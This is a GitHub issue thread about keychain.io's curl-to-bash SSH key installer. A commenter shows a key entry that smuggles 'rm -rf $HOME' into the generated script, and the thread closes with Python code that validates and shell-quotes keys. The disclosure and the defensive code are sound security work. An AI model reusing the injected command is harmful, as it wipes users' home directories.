progrium / keychain.io


Piping to bash is not secure #3

Open grimborg opened 11 years ago

grimborg commented 11 years ago

I love the idea, but curl -s | bash is not something any user should trust.

It's also very easy to inject commands, check out my key (do NOT install it!).

```
$ curl -s http://ssh.keychain.io/grimborg@gmail.com/install
mkdir -p $HOME/.ssh
touch $HOME/.ssh/authorized_keys
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDCDav6GptWnxXDEV5XK891RQfr6BGYLOoJ4RTttz57IQkMwt5SxVX581hGjhHwMSYlNGnI1BXKSnN25ZohU33k4pfyWtcfBZb6YL2FLzDQcIM3iNOwRW4aW6ABbPwL6LmO/rbu02sBWvf8Oqwc4GtXt4O1++gZcbHCSP1VE/YXR8wRrjP2wNWhCE8PYIO07w8p918QlvPLSO3vU9VH0cXph31ENkweOl20Nzys/CYglT518cLRBY2NWiQ1eQEVFuThLDBLu50GOkC7OgjgM3hhiRLjj/HdeVnzM/9ZAiaqJY0Q1HvM6QUT7Z2gcPn9UIicEAIT9fFRstD6MqE9v0x9 grimborg@gmail.com"; rm -rf $HOME; "" >> $HOME/.ssh/authorized_keys
```

But even if the injection is fixed, piping to bash is inherently insecure. How about having a keychain client that would install the keys? I'd be happy to contribute.

sysr-q commented 11 years ago

There could be some form of rough check in place (even if it's a hacked-in regex, for the time being) to make sure they at least adhere to a general-ish style.

A keychain client would be nifty, that would be a better way in my opinion as well.

progrium commented 11 years ago

You guys are right. Maybe it can install some sort of lightweight client. Let me rethink it for a bit as this was just a proof of concept. Thanks for the input!

Seldaek commented 11 years ago

Also, besides the considerations of piping into bash or not, please use a complete https url and not just ssh.keychain.io. Using curl -sS would also be a bit better since that hides output but shows errors.

phrozen commented 11 years ago

Just a thought on this: returning bash commands to run hits some of us with Windows machines too. Would love a generic API for all.

nodesocket commented 10 years ago

One option: ssh-keygen can be used to calculate the fingerprint of a key file, which will fail if you don't pass it a valid key.
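The server-side check that sysr-q's and nodesocket's comments point at, written up as an added example (not code from the keychain.io project): the key entry is validated against a strict grammar and its blob is decoded to confirm it really starts with the declared key type, and the installer line is then emitted with the key as a shell-quoted literal so a comment like the one in grimborg's demo can never become a command. The ed25519 sample key is constructed in the block and is not a real credential.

```python
import base64
import re
import shlex
import struct

# Strict grammar for one authorized_keys entry: key type, base64 blob, optional comment.
# The comment is limited to a conservative character set so it can never break out of quoting.
_KEY_TYPES = {"ssh-rsa", "ssh-ed25519", "ecdsa-sha2-nistp256",
              "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521"}
_ENTRY_RE = re.compile(
    r"^(?P<type>[a-z0-9-]+) (?P<blob>[A-Za-z0-9+/]+={0,2})(?: (?P<comment>[A-Za-z0-9._@+-]{1,64}))?$"
)


def validate_authorized_key(line: str) -> str:
    """Return a canonical 'type blob [comment]' entry or raise ValueError."""
    m = _ENTRY_RE.match(line.strip())
    if not m:
        raise ValueError("entry does not match the authorized_keys grammar")
    key_type, blob, comment = m.group("type"), m.group("blob"), m.group("comment")
    if key_type not in _KEY_TYPES:
        raise ValueError(f"unsupported key type {key_type!r}")
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError as exc:
        raise ValueError("key blob is not valid base64") from exc
    # Wire format (RFC 4253): the blob begins with a uint32 length-prefixed string that
    # must repeat the key type; anything else is not an SSH public key at all.
    if len(raw) < 4:
        raise ValueError("key blob too short")
    (n,) = struct.unpack(">I", raw[:4])
    if raw[4:4 + n] != key_type.encode("ascii"):
        raise ValueError("key blob does not encode the declared key type")
    return " ".join(p for p in (key_type, blob, comment) if p)


def render_install_script(line: str) -> str:
    """Emit the installer with the key as a quoted literal the shell never interprets."""
    entry = validate_authorized_key(line)
    return (
        "mkdir -p \"$HOME/.ssh\"\n"
        "chmod 700 \"$HOME/.ssh\"\n"
        f"printf '%s\\n' {shlex.quote(entry)} >> \"$HOME/.ssh/authorized_keys\"\n"
    )


# Constructed sample (not a real credential): an ed25519 public key whose 32 bytes are zero.
SAMPLE_KEY = "ssh-ed25519 " + base64.b64encode(
    struct.pack(">I", 11) + b"ssh-ed25519" + struct.pack(">I", 32) + bytes(32)
).decode("ascii") + " alice@example.com"
```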